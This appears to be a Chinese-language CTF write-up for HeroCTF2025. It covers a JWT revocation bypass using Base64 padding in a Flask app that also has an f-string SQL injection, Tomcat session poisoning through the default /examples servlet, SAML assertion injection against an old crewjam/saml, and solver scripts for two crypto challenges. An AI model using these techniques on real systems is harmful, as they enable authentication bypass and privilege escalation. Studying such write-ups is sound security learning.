3030 words
15 minutes
HeroCTF2025
2025-12-01

web#

Revoked#

import os
import secrets
import sqlite3
import time
from functools import wraps
import bcrypt
import jwt
from dotenv import load_dotenv
from flask import (
Flask,
flash,
jsonify,
make_response,
redirect,
render_template,
request,
)
app = Flask(__name__)
app.static_folder = "static"
load_dotenv()
app.config["SECRET_KEY"] = "".join(
[secrets.choice("abcdef0123456789") for _ in range(32)]
)
FLAG = os.getenv("FLAG")
def init_db():
conn = sqlite3.connect("database.db")
cursor = conn.cursor()
cursor.execute("""DROP TABLE IF EXISTS employees;""")
cursor.execute("""DROP TABLE IF EXISTS revoked_tokens;""")
cursor.execute("""DROP TABLE IF EXISTS users;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE NOT NULL,
is_admin BOOL NOT NULL,
password_hash TEXT NOT NULL)""")
cursor.execute("""CREATE TABLE IF NOT EXISTS revoked_tokens (
id INTEGER PRIMARY KEY AUTOINCREMENT,
token TEXT NOT NULL)""")
cursor.execute("""CREATE TABLE IF NOT EXISTS employees (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL,
email TEXT UNIQUE NOT NULL,
position TEXT NOT NULL,
phone TEXT NOT NULL,
location TEXT NOT NULL)""")
conn.commit()
conn.close()
def get_db_connection():
conn = sqlite3.connect("database.db")
conn.row_factory = sqlite3.Row
return conn
def token_required(f):
@wraps(f)
def decorated(*args, **kwargs):
token = request.cookies.get("JWT")
if not token:
flash("Token is missing!", "error")
return redirect("/login")
try:
data = jwt.decode(token, app.config["SECRET_KEY"], algorithms=["HS256"])
username = data["username"]
conn = get_db_connection()
user = conn.execute(
"SELECT id,is_admin FROM users WHERE username = ?", (username,)
).fetchone()
revoked = conn.execute(
"SELECT id FROM revoked_tokens WHERE token = ?", (token,)
).fetchone()
conn.close()
if not user or revoked:
flash("Invalid or revoked token!", "error")
return redirect("/login")
request.is_admin = user["is_admin"]
request.username = username
except jwt.InvalidTokenError:
flash("Invalid token!", "error")
return redirect("/login")
return f(*args, **kwargs)
return decorated
@app.route("/", methods=["GET"])
def index():
token = request.cookies.get("JWT", None)
if token is None:
return redirect("/login")
else:
return redirect("/employees")
@app.route("/register", methods=["GET", "POST"])
def register():
if request.method == "GET":
return render_template("register.html")
elif request.method == "POST":
data = request.form
username = data.get("username")
password = data.get("password")
if not username or not password:
return jsonify({"message": "Username and password required!"}), 400
password_hash = bcrypt.hashpw(
password.encode("utf-8"), bcrypt.gensalt()
).decode("utf-8")
conn = get_db_connection()
try:
conn.execute(
"INSERT INTO users (username, is_admin, password_hash) VALUES (?, ?, ?)",
(username, False, password_hash),
)
conn.commit()
except sqlite3.IntegrityError:
flash("User already exists.", "error")
return redirect("/register")
finally:
conn.close()
flash("User created successfully.", "success")
return redirect("/login")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "GET":
return render_template("login.html")
elif request.method == "POST":
data = request.form
username = data.get("username")
password = data.get("password")
conn = get_db_connection()
user = conn.execute(
"SELECT * FROM users WHERE username = ?", (username,)
).fetchone()
conn.close()
if user and bcrypt.checkpw(
password.encode("utf-8"), user["password_hash"].encode("utf-8")
):
token = jwt.encode(
{
"username": username,
"is_admin": user["is_admin"],
"issued": time.time(),
},
app.config["SECRET_KEY"],
algorithm="HS256",
)
resp = make_response(redirect("/employees"))
resp.set_cookie("JWT", token)
return resp
flash("Invalid credentials.", "error")
return redirect("/login")
@app.route("/logout", methods=["GET"])
def logout():
token = request.cookies.get("JWT")
if token:
conn = get_db_connection()
conn.execute("INSERT INTO revoked_tokens (token) VALUES (?)", (token,))
conn.commit()
conn.close()
resp = make_response(redirect("/login"))
resp.delete_cookie("JWT")
return resp
@app.route("/employees", methods=["GET"])
@token_required
def employees():
query = request.args.get("query", "")
conn = get_db_connection()
cursor = conn.cursor()
cursor.execute(
f"SELECT id, name, email, position FROM employees WHERE name LIKE '%{query}%'"
)
results = cursor.fetchall()
conn.close()
print(request.username)
return render_template("employees.html", username=request.username, employees=results, query=query)
@app.route("/employee/<int:employee_id>", methods=["GET"])
@token_required
def employee_details(employee_id):
conn = get_db_connection()
employee = conn.execute(
"SELECT * FROM employees WHERE id = ?", (employee_id,)
).fetchone()
conn.close()
print(employee)
if not employee:
flash("Employee not found", "error")
return redirect("/employees")
return render_template("employee_details.html", username=request.username, employee=employee)
@app.route("/admin", methods=["GET"])
@token_required
def admin():
is_admin = getattr(request, "is_admin", None)
if is_admin:
return render_template("admin.html", username=request.username, flag=FLAG)
flash("You don't have the permission to access this area", "error")
return redirect("/employees")
if __name__ == "__main__":
init_db()
app.run(debug=False, host="0.0.0.0", port=5000)

考点是系统通过检查 revoked_tokens 表来判断 Token 是否失效。

main.py
revoked = conn.execute(
"SELECT id FROM revoked_tokens WHERE token = ?", (token,)
).fetchone()
if not user or revoked:
flash("Invalid or revoked token!", "error")
return redirect("/login")

这里存在一个逻辑缺陷: SQL 查询使用的是精确字符串匹配 ,而 JWT 解码库 ( pyjwt ) 对 Base64 填充字符(Padding)是不敏感的 。 JWT 由三部分组成(Header.Payload.Signature),使用 Base64Url 编码。标准 Base64 编码的长度应该是 4 的倍数,不足时使用 = 填充。Base64Url 通常会省略 = ,但大多数解码器(包括 pyjwt )都能同时处理带填充和不带填充的版本。

如果我们在 Token 末尾添加一个 = (且不破坏 Base64 格式),对于 pyjwt 来说它仍然是同一个有效的 Token(解码出的二进制签名一致),但对于数据库来说,它是一个完全不同的字符串,从而绕过 revoked_tokens 表的黑名单检查。

Revoked Revenge#

和Revoked一样有点hyw

Tomwhat#

1. 源代码审计

通过分析题目提供的源码(Dockerfile, run.sh, Java Servlet 代码):

  • LightServlet (/light/): 允许用户设置 session 中的 username,但明确禁止设置为 darth_sidious

    if ("darth_sidious".equalsIgnoreCase(username)) {
    req.setAttribute("error", "Forbidden username.");
    // ...
    }
  • DarkServlet & AdminServlet (/dark/): AdminServlet 只有当 session 中的 usernamedarth_sidious 时才会输出 flag。

    if ("darth_sidious".equalsIgnoreCase(username)) {
    html.append("<p>Welcome Lord Sidious, Vador says: Hero{fake_flag}.</p>");
    }

2. 关键配置 (The “Magic”)

run.sh 中,我们发现了几处关键的 Tomcat 配置修改:

  1. Session 共享:

    Terminal window
    sed -i 's/<Context>/<Context sessionCookiePath="\/">/' "$f"

    这行命令将所有应用的 Session Cookie 路径设置为根目录 /。这意味着,你在一个应用(如 /light)中获得的 JSESSIONID,在访问另一个应用(如 /dark)时也会被浏览器发送。

  2. 持久化存储: 使用了 PersistentManagerFileStore,将 Session 存储在磁盘的临时目录下。这意味着只要 Session ID 相同,不同的 Web Context(应用)可以读取到同一个 Session 对象(前提是它们能反序列化其中的对象,这里是简单的 String,没问题)。

3. 寻找突破口

既然 /light 应用禁止我们设置 darth_sidious,我们需要找到另一个途径来往 Session 中写入数据。

通过探测或经验可知,默认的 Tomcat 安装通常包含 /examples/ 示例应用。虽然题目描述中没有明确提及,但 Dockerfile 是基于官方 Tomcat 镜像构建的,且没有删除默认应用。

访问 http://host:port/examples/ 发现是存在的。 在 /examples/servlets/servlet/SessionExample 中,有一个示例 Servlet 允许用户任意设置 Session 属性名和属性值

Exploit

  1. 利用 /examples/ 设置 Session: 访问 Tomcat 自带的 Session 示例页面,构造请求将 username 设置为 darth_sidious

    • URL: http://dyn06.heroctf.fr:14033/examples/servlets/servlet/SessionExample
    • Parameters: dataname=username, datavalue=darth_sidious
  2. 访问 /dark/admin 获取 Flag: 由于 sessionCookiePath="/" 的配置,刚才获取的 JSESSIONID 会自动带入到对 /dark/admin 的请求中。Tomcat 会加载同一个 Session,读取到我们刚刚写入的 username

自动化脚本 (Python)

import requests
base_url = "http://dyn06.heroctf.fr:14033"
session_url = f"{base_url}/examples/servlets/servlet/SessionExample"
admin_url = f"{base_url}/dark/admin"
s = requests.Session()
# 1. 利用 examples 应用设置 session 属性
# 这绕过了 LightServlet 的输入检查
print(f"[*] Setting session attribute via {session_url}...")
payload = {
"dataname": "username",
"datavalue": "darth_sidious"
}
s.get(session_url, params=payload)
# 2. 带着同一个 Session 访问 admin
print(f"[*] Accessing {admin_url}...")
r = s.get(admin_url)
print("[*] Response:")
print(r.text)

SAMLevinson#

SAML 是一种基于 XML 的标准,用于在 身份提供商 (IDP)服务提供商 (SP) 之间交换身份数据。

  • 正常流程: 用户在 IDP 登录 -> IDP 生成包含用户信息的 XML (SAML Response) -> IDP 对其签名 -> 用户将 Response 发送给 SP -> SP 验证签名 -> SP 信任并登录用户。
  • 漏洞成因: 在 crewjam/saml 库的 0.4.9 版本之前,SP 在处理包含多个断言 (Assertion) 的 SAML 响应时存在逻辑缺陷:
    1. 它会正确验证第一个断言的数字签名。
    2. 但是,在提取用户属性(如用户名、用户组)时,它会遍历所有断言。
    3. 利用点: 攻击者可以在合法的、已签名的断言后面,追加一个恶意的、未签名的断言。SP 验证了第一个断言的签名,认为响应合法,随后却读取了第二个恶意断言中的数据(如 uid=admin),从而导致权限提升。

第一步:环境探测与正常登录

题目提供了两个 URL:

  • SP (应用端): http://web.heroctf.fr:8080
  • IDP (认证端): http://web.heroctf.fr:8081

以及普通用户凭证:user / oyJPNYd3HgeBkaE%!rP#dZvqf2z*4$^qcCW4V6WM

我们首先进行一次正常的登录流程,目的是获取一个合法的 SAMLResponse

  1. 访问 http://web.heroctf.fr:8080/flag,被重定向到 IDP。
  2. 使用提供的账号密码在 IDP 登录。
  3. IDP 验证通过后,会生成一个 HTML 表单,自动 POST 提交 SAMLResponse 给 SP。
  4. 关键操作: 我们需要拦截并保存这个原始的 SAMLResponse (Base64 编码字符串)。

第二步:构造恶意 Payload (SAML 注入)

这是解题的核心。我们需要编写脚本处理 XML。

逻辑如下:

  1. 解码: 将拦截到的 Base64 字符串解码为 XML 文本。
  2. 定位合法断言: 在 XML 中找到 <saml:Assertion> 节点。这是由 IDP 签名的,我们要保留它以通过 SP 的签名验证。
  3. 克隆并伪造:
    • 复制: 将该 Assertion 节点完整复制一份。
    • 去签: 删除副本中的 <ds:Signature> 节点(因为我们没有 IDP 的私钥,无法生成有效签名,且留着无效签名会导致验证失败)。
    • 修改 ID: 为副本生成一个新的随机 ID 属性(避免 ID 冲突)。
    • 提权: 修改副本中的属性值。
      • uid 的值从 user 改为 admin
      • eduPersonAffiliation 的值从 Users 改为 Administrators
  4. 注入: 将伪造的 Assertion 插入到 XML 的 <samlp:Response> 根节点中,紧跟在合法 Assertion 之后。
  5. 编码: 将修改后的 XML 重新进行 Base64 编码。

第三步:发送攻击请求

使用 curl 或 Python 脚本,向 SP 的 ACS (Assertion Consumer Service) 接口发送 POST 请求。

  • URL: http://web.heroctf.fr:8080/saml/acs
  • Data:
    • RelayState: (保持原始登录流程中的值)
    • SAMLResponse: (我们伪造的 Base64 字符串)

4. Payload 结构可视化

修改后的 XML 结构大致如下:

<samlp:Response ...>
<!-- 1. 合法的、已签名的断言 (用于绕过签名验证) -->
<saml:Assertion ID="id-valid-signed">
<ds:Signature> ... (有效的 IDP 签名) ... </ds:Signature>
<saml:Attribute Name="uid">user</saml:Attribute>
<saml:Attribute Name="eduPersonAffiliation">Users</saml:Attribute>
</saml:Assertion>
<!-- 2. 恶意的、未签名的断言 (用于污染属性) -->
<saml:Assertion ID="id-malicious-unsigned">
<!-- 注意:这里没有 Signature 节点 -->
<saml:Attribute Name="uid">admin</saml:Attribute>
<saml:Attribute Name="eduPersonAffiliation">Administrators</saml:Attribute>
</saml:Assertion>
</samlp:Response>

5. 结果验证

服务器处理逻辑:

  1. 检查 XML 结构。
  2. 验证 Assertion[0] 的签名 -> 通过 (因为它是原版未动的)。
  3. 加载用户属性 -> 库函数遍历所有 Assertion -> 读取到了 uid=adminGroup=Administrators
  4. 更新 Session -> 用户变为管理员。

最终页面返回:

<div class="brand">⚑ HeroCTF • Protected Area</div>
<div class="who"><span class="tag admin">Admin</span></div>
...
<pre class="flag" id="flagBox">Hero{S4ML_3XPL01T_FR0M_CR3J4M}</pre>

crypto#

Andor#

关键代码

#!/usr/bin/env python3
import secrets
AND = lambda x, y: [a & b for a, b in zip(x, y)]
IOR = lambda x, y: [a | b for a, b in zip(x, y)]
with open("flag.txt", "rb") as f:
flag = [*f.read().strip()]
l = len(flag) // 2
while True:
k = secrets.token_bytes(len(flag))
a = AND(flag[:l], k[:l])
o = IOR(flag[l:], k[l:])
print("a =", bytearray(a).hex())
print("o =", bytearray(o).hex())
input("> ")

上半部分:AND 运算 (a = flag_top & k)

  • 公式a=flagka = flag \land k
  • 特性:AND 运算只要有一位是 0,结果就是 0;只有当两位都是 1 时,结果才是 1。
  • 推论:如果在某次随机尝试中,结果 a 的某一位是 1,那么 flag 对应的位必须1
  • 攻击方法:我们收集多次结果,将它们进行 按位或(Bitwise OR) 运算。只要尝试次数足够多,随机数 k 总会覆盖到所有的位,最终还原出 flag 中所有的 1。
    • Recoveredtop=a1a2a3anRecovered_{top} = a_1 \lor a_2 \lor a_3 \dots \lor a_n

下半部分:OR 运算 (o = flag_bottom | k)

  • 公式o=flagko = flag \lor k
  • 特性:OR 运算只要有一位是 1,结果就是 1;只有当两位都是 0 时,结果才是 0。
  • 推论:如果在某次随机尝试中,结果 o 的某一位是 0,那么 flag 对应的位必须0
  • 攻击方法:我们收集多次结果,将它们进行 按位与(Bitwise AND) 运算。初始状态假设 flag 全是 1,通过不断的 AND 运算,把 flag 中原本是 0 的位置“削”出来。
    • Recoveredbottom=o1o2o3onRecovered_{bottom} = o_1 \land o_2 \land o_3 \dots \land o_n

exp

from pwn import *
from Crypto.Util.number import long_to_bytes
# r = process(['python3', 'chal.py'])
r = remote('crypto.heroctf.fr', 9000)
context.log_level = 'error'
top, bottom = 0, -1
for _ in range(60):
r.recvuntil(b"a = ")
top |= int(r.recvline().strip(), 16)
r.recvuntil(b"o = ")
bottom &= int(r.recvline().strip(), 16)
r.sendline(b"")
print(long_to_bytes(top) + long_to_bytes(bottom))

Perilous#

关键代码

def encrypt(k: str, m: str) -> str:
k = bytes.fromhex(k)
m = bytes.fromhex(m)
if k in KEYS:
raise Exception("Duplicate key used, aborting")
KEYS.append(k)
algorithm = algorithms.ARC4(k)
cipher = Cipher(algorithm, mode=None)
encryptor = cipher.encryptor()
m = xor(m, MASK)
m = encryptor.update(m)
m = xor(m, MASK)
return m.hex()

这道题的核心是一个数学障眼法(Red Herring)

虽然代码看起来很复杂,引入了一个随机的 MASK 并进行了两次异或操作,但实际上这些操作完全相互抵消了。

让我们看看加密函数中的核心逻辑:

m = xor(m, MASK) # 第一步:与 MASK 异或
m = encryptor.update(m) # 第二步:RC4 加密
m = xor(m, MASK) # 第三步:再次与 MASK 异或

我们需要知道两个关键点:

  1. RC4 是流密码(Stream Cipher):它的本质是生成一个密钥流(Keystream, 设为 SS),然后与明文进行异或。即 RC4(m) = m ^ S
  2. 异或的性质
    • 交换律:AB=BAA \oplus B = B \oplus A
    • 结合律:(AB)C=A(BC)(A \oplus B) \oplus C = A \oplus (B \oplus C)
    • 自反性:AA=0A \oplus A = 0,且 X0=XX \oplus 0 = X

将加密过程写成数学公式:Ciphertext=(PlaintextMASK)SMASKCiphertext = (\text{Plaintext} \oplus \text{MASK}) \oplus S \oplus \text{MASK}

利用结合律和交换律重新排列:Ciphertext=PlaintextS(MASKMASK)Ciphertext = \text{Plaintext} \oplus S \oplus (\text{MASK} \oplus \text{MASK})

因为 MASKMASK=0\text{MASK} \oplus \text{MASK} = 0,所以:Ciphertext=PlaintextSCiphertext = \text{Plaintext} \oplus S

结论MASK 完全没用!这个加密函数等价于标准的 RC4 加密。你不需要知道 MASK 是什么,也不需要关心它。

exp:

from pwn import *
# 16字节 Key 防止服务器报错
key = b'0' * 32
# 1. 获取加密 Flag
r1 = remote('crypto.heroctf.fr', 9001)
r1.sendlineafter(b': ', key)
flag_enc = bytes.fromhex(r1.recvline().strip().decode())
r1.close()
# 2. 获取密钥流 (Keystream)
r2 = remote('crypto.heroctf.fr', 9001)
r2.sendlineafter(b': ', b'1' * 32) # 跳过开场
r2.sendlineafter(b': ', key) # 重用 Key
r2.sendlineafter(b': ', b'00' * len(flag_enc)) # 发送全0明文
keystream = bytes.fromhex(r2.recvline().strip().decode())
r2.close()
# 3. 解密 (利用 pwn 自带 xor)
print(xor(flag_enc, keystream).decode())
HeroCTF2025
https://return-sin.github.io/-sinQwQ-/posts/heroctf2025/
Author
sinQwQ
Published at
2025-12-01
License
CC BY-NC-SA 4.0